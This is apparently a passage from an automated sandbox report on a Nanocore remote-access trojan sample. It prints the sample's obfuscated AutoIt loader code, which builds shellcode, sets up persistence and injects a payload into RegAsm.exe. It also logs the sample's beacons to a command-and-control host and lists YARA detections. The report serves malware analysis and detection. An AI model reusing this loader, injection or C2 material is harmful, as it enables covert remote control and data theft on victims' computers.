("53..,..6..,..5..7..,6..0..,..57..,62,6..0..,..5..8..,5..,5..3,..58..,..6,61..,2,..3,..5..9,..58..,5..,5..8,..4..,..3,..5..5,..53..,..57,..53" , ".." ) ) $656182541 = 1655436234 MOD (1348810 , 1037731 ) ENDIF IF $656182541 = 1942454486 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59..,5..6,..57..,60..,..58..,5..3,..6..,5..8,..53,6..,..6..,60..,..58,4,6..1,..6..,6..,..58,..58,2,..5..3..,6..1,5..8..,3..,..53.." , ".." ) ) ISSTRING ("d7GXNY9GDfwkqiKj9mUntDCkoTrcKj8Ef9IILvZuMCOgFHWeUg8sUg" ) $656182541 = 1131844544 ENDIF IF $656182541 = 1947300206 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..1,..5..3,61,..3,..60..,61..,..5..8,..59,3,..6..,6..,6,..6,6..,..6..,..5..,..5..6..,..3,..1..,4,..61..,5..3..,..5..6,..3" , ".." ) ) ISSTRING (3735416 + 3465486 ) $656182541 = 116925729 ISBOOL (1547430 + 4291515360 * 1477392 ) ENDIF IF $656182541 = 1970938970 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..0..,61..,..4..,..5..7,58..,..5,..6..1,3,..6..0,61,..58..,..5..8,..3,6,6,6,6..,..6..,..6,..60..,62,57,..1,6..1.." , ".." ) ) RANDOM (831899 ) $656182541 = 1296565717 ENDIF IF $656182541 = 1974167312 THEN LOCAL $E = EXECUTE PTR (294655 * 3649188 ) $656182541 = 860380632 ISSTRING ("NBDESHu4vFqUhR17tOAjBggAI7s1CJ4uEyboCRJ7ZVzBKp7H57EagkFGvd6VpDAVL5oTQLELfCtRRN0saU5Ff3ot2D2yVYSvtN0Obo2sB25M0YZSnMVE" ) ISFLOAT (2773503 * 755756 * 391473 * 1103808 ) ENDIF IF $656182541 = 1974292710 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,58,..4..,3,6,5..,6,6,..6,6..,..5..8,5..3..,6,6..,..58,..58,5..,..6..1,..59..,..6..1,..3,..3..,..5..3..,5..5,53.." , ".." ) ) STRING ("krV2Len8LCdNkkhdnXy8g8fxQIvaN12AW4dv9L50BVfBWGI4UnHl8eRllxmdSmtUKM1qhWeK1IGv3NLiaAqAtQCSn1jKz2ho" ) $656182541 = 871530397 ISFLOAT ("7i6uyHusHWdcr63A4jjcqMCl8Br4HXBDSNsrwvdk2IKZw0ZrH459FpGuQUw7pAUVtIuNNLdIg8kSbMZiL9vN1B7Bh7KL9f5" ) ENDIF IF $656182541 = 2022545531 THEN #region FLVAxkkwT $656182541 = 1713506615 ISPTR (775609 * 3395171 + 4291409108 ) PTR ("5ovpe" ) ENDIF IF $656182541 = 2032766480 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..5..6,58..,..59..,..5..8..,6..0,..56..,5..6..,..6,..6,6..1..,62,6..0,..4,..2,..6..1..,59..,..5..7..,6..1..,2,5..6,5..8,..56,..53,..53" , ".." ) ) $656182541 = 116471326 WINEXISTS ("QaAJadT3khcMzuzXEIzxrMIRUTOwR6NlMO76yW2Du5i53K64NtyrlEocAUZrxwm" ) ENDIF IF $656182541 = 2054240656 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..6..,3,..5..3,..5..9..,5..9,5..6..,62..,5..8,..5..9,53..,5..7..,53..,6,62,5..7,..3..,53,..56,..4,..5..7,3,53,..5..4,..53.." , ".." ) ) ISPTR ("xSR6cwENXjXUSwHv9iA5EN6Kf8S4BcLmHk5QKpC1HX6QDNNZQh11sB8TW" ) $656182541 = 238457315 ENDIF IF $656182541 = 2057237529 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,6..,6,6..,6,..6..1,..56,..3..,..5..3,..5..3..,..6..1..,..58..,53..,6..,6,..6..0..,58,4,6..1..,..6,6..,58,5..8,..6..2..,5..7.." , ".." ) ) ISPTR (2376345 + 4293184136 ) $656182541 = 1747756201 ISPTR (2313154 * 2822069 + 423786 ) ENDIF IF $656182541 = 2060391673 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7..,5..8..,..1..,..53,..61..,62,..6..1,..58..,..5..7..,..5..3..,..6..,6..,..6..,..6..,6..,..6..,..61,4..,..57..,58..,62..,..5..3,61,62..,..61.." , ".." ) ) INT (690914 ) $656182541 = 954977294 DIM $LM4EZYM8LLI3BGXYVHLT = 367976 ENDIF IF $656182541 = 2069227035 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..6,6,..6..0..,..59,..5..8..,5..3,6,6..,..6..0..,..59..,..5..6,..5..7,..6,6,..60..,..5..8,..4..,..61,..6,6,..58,5..8,..3..,..5..3.." , ".." ) ) STRING (3068014 * 2377603 * 2825303 ) $656182541 = 762027222 ENDIF IF $656182541 = 2081176827 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..7,..58..,6..1,..5,2,5..3..,3,..1..,..62..,53..,..53..,..5..3,5..3,..5..3..,5..3..,57,..53..,5..9,1,5..3..,..53,5..8,61,5..3.." , ".." ) ) $656182541 = 1061461686 ENDIF IF $656182541 = 2119340110 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0,..58..,..5..3..,..56,..5..6..,..5..6..,6,6,..57,..6..0,56..,5..6,..4..,55..,..61,..6..2,..6..0,4..,..6..,..5..7..,56,..56,3..,..53,6..1" , ".." ) ) MOD (13383 , 840807 ) $656182541 = 217336870 RANDOM (204136 ) RANDOM (3648981 ) ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF IF $PERSIST THEN QTMVSHRFRD ($RET [ZVTZJDNXHRPQQIM ("53" ) ] ) ENDIF ENDFUNC #endregion FUNC BFSEZOFQQVRV () GLOBAL $1300820860 = 256356752 GLOBAL $AOAMUJVLTV = 2033156 FOR $E = 0 TO 551583 ISPTR (1420540 + 2012189 + 4291840624 + 4292863764 ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..35,4..6,..1..,14,4" , ".." ) ) ) EXITLOOP MOD (2197646 , 498204 ) ENDIF IF $1300820860 = 256356752 THEN #region TuBoprHKA $1300820860 = 176683708 INT (2436641 ) STRING (3043919 * 1765421 ) ENDIF NEXT ENDFUNC FUNC QUBCAHBBZKYJ () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5,4..6,..15..,1..8.." , ".." ) ) ) ENDFUNC FUNC DDKWOYMJJPNF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5..,..4..6,24..,15,18" , ".." ) ) ) ENDFUNC FUNC JWWTSBPFTDYX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,38..,..38,3,..2..7..,..38,..3..8" , ".." ) ) ) ENDFUNC FUNC CRAYOQRFEAMS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..3..8,38..,..1..9,..46..,..4..4,..47,29,46,3..,..44..,..31..,27..,4..6,..31.." , ".." ) ) ) ENDFUNC FUNC BVMQYYKUKURA () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,38..,38,..19..,46..,..44..,4..7..,2..9,..46..,7,3..1,4..6,..4..,..2..7..,4..6..,..27" , ".." ) ) ) ENDFUNC FUNC YRBQDBYJGKXS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5,38,3..1..,..3,38..,..41,..4..5..,3..1.." , ".." ) ) ) ENDFUNC FUNC SHYKZNWGXGSG () GLOBAL $1300820860 = 256356752 GLOBAL $PNXRSOATLI = 3486648 FOR $E = 0 TO 710159 DIM $HNMUDSVCSZ60IMVSF3YB = "JUZSyHbRCVfD3MxDgsoFWuxv2gw74drr0V" IF $1300820860 = 176683708 THEN #endregion STRING (2638799 + 3112428 * 2601353 * 1450734 ) EXITLOOP STRING ("JjEEpwD0sldXzDXNhfDgDNElaETEFzwJOeSiuprG3WvIq9zkdSH33hE5NsEUM8u2YChuWOs1Y7nRr64bfIBX2CRHJWDcVH44BDUY1eyyzQf53XNSxCOdG" ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,3..8,3..1,3,..4..4..,..31..,27..,46..,3..1..,1..9,34,4..1..,..44,..4..6,29..,..47,4..6.." , ".." ) ) ) STRING (2299404 * 720385 + 391200 + 212652 ) $1300820860 = 176683708 DIM $JAJDWMXWNWIVNS20W4DY = 182921 ENDIF NEXT ENDFUNC FUNC MNIAOQEHLRXV () GLOBAL $1300820860 = 256356752 GLOBAL $NJJZ2JH0FR = 1612056 FOR $E = 0 TO 1284805 ISSTRING ("79591zMXxm6utXd1RVZnLH4ensov8n63URAdwtGXFWAOMnFTnB6iN6kyf1WIkqZjpdJMvaExncR0goAaWFhFqYoYFc8EH8M" ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5..,..3..8..,..31,..5..,50..,..3..5..,..4..5,4..6,..4..5.." , ".." ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #endregion WINEXISTS ("n7I4Lour0AVXNis2AYWhtb90pyB2ZZ0w3i4IS3MIkUheWk" ) $1300820860 = 176683708 ISBINARY ("V0Wel8SOmXCCbJy4FoUjGlm6I35eeAunz1fFgeSK9ozWRrgDwqB24oAJNZErcNJWBockE2XBFjksWzorXARX8BskAF2rIzHvNMtCo69EDawVehXnJmEL" ) PTR ("1T99E2gKZNifWc1Als7fHgsSORw56x1YtFxmaE9ipjpDOhXkMkVD15yUAquXFlOAXtWpOOAQtZZx0ZcG3lrVMw7xhMVTklLeDYRvuGF7Tekbga3L" ) ENDIF NEXT ENDFUNC FUNC AZMTVPRVIOXM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,35..,38,31..,..15,4..2..,..31..,40.." , ".." ) ) ) ENDFUNC FUNC WCCBBCANDNZP () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..5,..38..,3..1..,..18,3..1,..27,3..0.." , ".." ) ) ) ENDFUNC FUNC ZPVYEEXEUEWT () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5,..38,..31..,..23..,44..,..3..5,4..6,3..1.." , ".." ) ) ) ENDFUNC FUNC YYEUJPRYPKCM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,40,31..,..46,7..,3..1..,46.." , ".." ) ) ) ENDFUNC FUNC IGCFQUUWMEAF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,..4..5,1,3..0..,3..9,..3..5,..4..0.." , ".." ) ) ) ENDFUNC FUNC CJCCIDDEPTLC () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..3,..45..,33,..2..,..41,5..0.." , ".." ) ) ) ENDFUNC FUNC ZPLPQGYBGRDG () GLOBAL $1300820860 = 256356752 GLOBAL $T34YZVYIB3 = 3599293 FOR $E = 0 TO 2828683 MOD (3030196 , 3600226 ) IF $1300820860 = 176683708 THEN #endregion EXITLOOP STRING (1287972 + 4294142251 ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..6,..4..4..,4..1..,29..,..3..1,..45,..45,3..,3..8..,..4..1,..45,..31.." , ".." ) ) ) DIM $TJEWRRKJAQ96YDEBIBZV = 434386 $1300820860 = 176683708 ISBOOL (2151701 + 4291471136 + 851125 ) ENDIF NEXT ENDFUNC FUNC QHMGHXJZKQDS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("16,4..4,..41..,2..9..,..3..1..,..4..5,..4..5,5..,..50,35,..45,..4..6,4..5" , ".." ) ) ) ENDFUNC GLOBAL $1300820860 = 256356752 GLOBAL $MI14JTB1SP = 2992520 FOR $E = 0 TO 3837253 IF $1300820860 = 176683708 THEN #endregion EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #region nsziBMbqjH PTR (3821692 * 2598776 + 4292133915 * 233491 ) $1300820860 = 176683708 STRING ("Yzk4VX0LZuJBt2qbtlaAepvgq9LqXiBJ96lIam" ) ENDIF NEXT FUNC RQBFMRVGXJYI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..8,..27,..4..0..,30..,41,..39.." , ".." ) ) ) ENDFUNC FUNC HGMGWWTPDNOR () GLOBAL $1300820860 = 256356752 GLOBAL $BKLQZCBPLW = 492947 FOR $E = 0 TO 3060378 IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("18,31..,..3..3..,23..,4..4,3..5,..4..6..,31" , ".." ) ) ) EXITLOOP DIM $YR3ACXQSBGBXZBI46ETW = 3229433 * 3554240 * 819568 + 2784574 + 4292975588 ENDIF IF $1300820860 = 256356752 THEN #endregion CHR (142645 ) $1300820860 = 176683708 ENDIF NEXT ENDFUNC FUNC RMOEECIWZOYF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..3..4..,..3..1,..3..8,..38..,..5,..50..,31,29..,..4..7,46..,..3..1" , ".." ) ) ) ENDFUNC FUNC QDGSBIXASIOK () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..38,31..,3..1..,..4..2.." , ".." ) ) ) ENDFUNC FUNC MSSFBHBPZKOB () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19..,46,..44,3..5,..4..0,3..3..,9..,..4..0,..19..,..46,..4..4.." , ".." ) ) ) ENDFUNC FUNC ZEBJKFZIPAFI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("21,2..,..41..,..4..7..,4..0..,3..0.." , ".." ) ) ) ENDFUNC FUNC XZRGVRFNYRGX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..3..,3..5,..40,..5..,..50..,..35..,45,..4..6,45" , ".." ) ) ) ENDFUNC FUNC ZVTZJDNXHRPQQIM ($STR ) GLOBAL $113519199 = 256356752 GLOBAL $JVAIKJVNZJ = 3556081 FOR $E = 0 TO 482371 CHR (3033401 ) IF $113519199 = 176683708 THEN LOCAL $SPLIT = STRINGSPLIT ($ALPHABET , "" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $ALPHABET = LUXBZMCWKPOC ("A..B..CD..EFG..HIJ..K..L..M..NO..PQ..RS..T..U..V..W..XY..Zabc..de..fghi..jkl..mno..p..q..r..s..t..u..v..wx..y..z0..1..2..34..5..6..78..9.." , ".." ) $113519199 = 176683708 RANDOM (3170570 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $RESULT ISPTR ("MdWUnM2DmvZ9vMRlMDwEmfG5K8YyzTWuomWSqd0kvm11oHphqKe2zZMGF0joYDdDIDVj095INmj9oORdTQhZN45yJplA4Kv2jws" ) EXITLOOP DIM $RQQEONQMS0IGFHVOZOIW = 2269440 ENDIF IF $113519199 = 1300820860 THEN LOCAL $STRINGSPLITTED = STRINGSPLIT ($STR , "," ) ISSTRING (162997 + 3383337 * 1470645 * 1064176 ) $113519199 = 1203322726 PTR ("QSS66vrYfoF4GNlz" ) ISSTRING ("lwzXBDmZ3TEfR80NLNBm17KV5tSU0eSx6sDusjE2e8lFbY0OvV5cb99oWO1hVB9ZahjyEEvCjJh2VfThCdyfjOv7toINswhM9wE4" ) ENDIF DIM $YB3B1GCR5UORC3OVVLEQ = 3765422 * 671547 * 1819674 + 4291390693 + 4292645635 * 1791171 + 3593431 NEXT FOR $I = "1" TO UBOUND ($STRINGSPLITTED ) - "1" $RESULT &= $SPLIT [$STRINGSPLITTED [$I ] ] NEXT RETURN $RESULT ENDFUNC DIM $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK LOCAL $STARTUPDIR = @USERPROFILEDIR & "\hdwwiz" LOCAL $BOOL = @SCRIPTDIR = $STARTUPDIR "True" "False" UCZPRNKTQP ("WinSAT" , "DiagnosticsHub.StandardCollector.Service.exe" ) $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK = URQHLYEYWJ ("0x494D4A504443546C" , "0x706D41484E505A786C49734E69595578575566536C475879594457574F615A67" , "10" ) DIM $LIUIVFNQUPEO = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"" ) DIM $EMYXOKTBATHL = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"" ) IF FILEEXISTS ($LIUIVFNQUPEO ) THEN RUNPE ($LIUIVFNQUPEO , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ELSEIF FILEEXISTS ($EMYXOKTBATHL ) THEN RUNPE ($EMYXOKTBATHL , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ENDIF DJXLPTMAOK () FUNC DJXLPTMAOK ()

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 20, 2020 07:24:02.535196066 CET4971220377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:05.538395882 CET4971220377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:11.538892031 CET4971220377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:21.237142086 CET4972820377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:24.243057013 CET4972820377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:30.243840933 CET4972820377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:39.295228958 CET4973320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:42.307034016 CET4973320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:24:48.323229074 CET4973320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:13.287843943 CET4974520377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:16.294404030 CET4974520377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:22.310477018 CET4974520377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:30.058449984 CET4974720377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:33.061260939 CET4974720377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:39.077476978 CET4974720377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:48.468041897 CET4974920377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:51.469167948 CET4974920377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:25:57.469616890 CET4974920377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:26:21.655730009 CET4975320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:26:24.659368038 CET4975320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:26:30.675429106 CET4975320377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:26:38.292778969 CET4975420377192.168.2.3192.190.19.55
                                                  Nov 20, 2020 07:26:41.303071976 CET4975420377192.168.2.3192.190.19.55

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 20, 2020 07:23:51.359072924 CET5836153192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:23:51.386352062 CET53583618.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:02.489017963 CET6349253192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:02.524512053 CET53634928.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:03.363210917 CET6083153192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:03.398821115 CET53608318.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:04.089700937 CET6010053192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:04.124996901 CET53601008.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:04.785423994 CET5319553192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:04.820997000 CET53531958.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:05.545089960 CET5014153192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:05.572156906 CET53501418.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:06.271161079 CET5302353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:06.298481941 CET53530238.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:06.989762068 CET4956353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:07.017035007 CET53495638.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:07.745724916 CET5135253192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:07.781692028 CET53513528.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:08.488189936 CET5934953192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:08.515381098 CET53593498.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:09.210068941 CET5708453192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:09.237176895 CET53570848.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:09.927449942 CET5882353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:09.965109110 CET53588238.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:10.627311945 CET5756853192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:10.654616117 CET53575688.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:11.423109055 CET5054053192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:11.450406075 CET53505408.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:15.116482019 CET5436653192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:15.143910885 CET53543668.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:18.898690939 CET5303453192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:18.925915956 CET53530348.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:21.197740078 CET5776253192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:21.235414982 CET53577628.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:25.472790956 CET5543553192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:25.512496948 CET53554358.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:36.823493958 CET5071353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:36.850688934 CET53507138.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:39.256642103 CET5613253192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:39.292143106 CET53561328.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:53.767348051 CET5898753192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:53.794534922 CET53589878.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:24:58.781589985 CET5657953192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:24:58.818485022 CET53565798.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:25:13.250663042 CET6063353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:25:13.285912037 CET53606338.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:25:28.846604109 CET6129253192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:25:28.873666048 CET53612928.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:25:30.020796061 CET6361953192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:25:30.056556940 CET53636198.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:25:30.586656094 CET6493853192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:25:30.613744020 CET53649388.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:25:48.431196928 CET6194653192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:25:48.466545105 CET53619468.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:26:21.617285967 CET6491053192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:26:21.654969931 CET53649108.8.8.8192.168.2.3
                                                  Nov 20, 2020 07:26:38.247783899 CET5212353192.168.2.38.8.8.8
                                                  Nov 20, 2020 07:26:38.283476114 CET53521238.8.8.8192.168.2.3

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Nov 20, 2020 07:24:02.489017963 CET192.168.2.38.8.8.80xa060Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:24:21.197740078 CET192.168.2.38.8.8.80x4378Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:24:39.256642103 CET192.168.2.38.8.8.80x41acStandard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:13.250663042 CET192.168.2.38.8.8.80x12fcStandard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:30.020796061 CET192.168.2.38.8.8.80xf013Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:48.431196928 CET192.168.2.38.8.8.80x4718Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:26:21.617285967 CET192.168.2.38.8.8.80x62c8Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:26:38.247783899 CET192.168.2.38.8.8.80x892aStandard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Nov 20, 2020 07:24:02.524512053 CET8.8.8.8192.168.2.30xa060No error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:24:21.235414982 CET8.8.8.8192.168.2.30x4378No error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:24:39.292143106 CET8.8.8.8192.168.2.30x41acNo error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:13.285912037 CET8.8.8.8192.168.2.30x12fcNo error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:30.056556940 CET8.8.8.8192.168.2.30xf013No error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:25:48.466545105 CET8.8.8.8192.168.2.30x4718No error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:26:21.654969931 CET8.8.8.8192.168.2.30x62c8No error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)
                                                  Nov 20, 2020 07:26:38.283476114 CET8.8.8.8192.168.2.30x892aNo error (0)windowslivesoffice.ddns.net192.190.19.55A (IP address)IN (0x0001)

                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576 Parent PID: 5772

                                                  General

                                                  Start time:07:23:57
                                                  Start date:20/11/2020
                                                  Path:C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe'
                                                  Imagebase:0x8f0000
                                                  File size:1124920 bytes
                                                  MD5 hash:5162337B6FD4C8806EF62F6EBF4A5DF8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
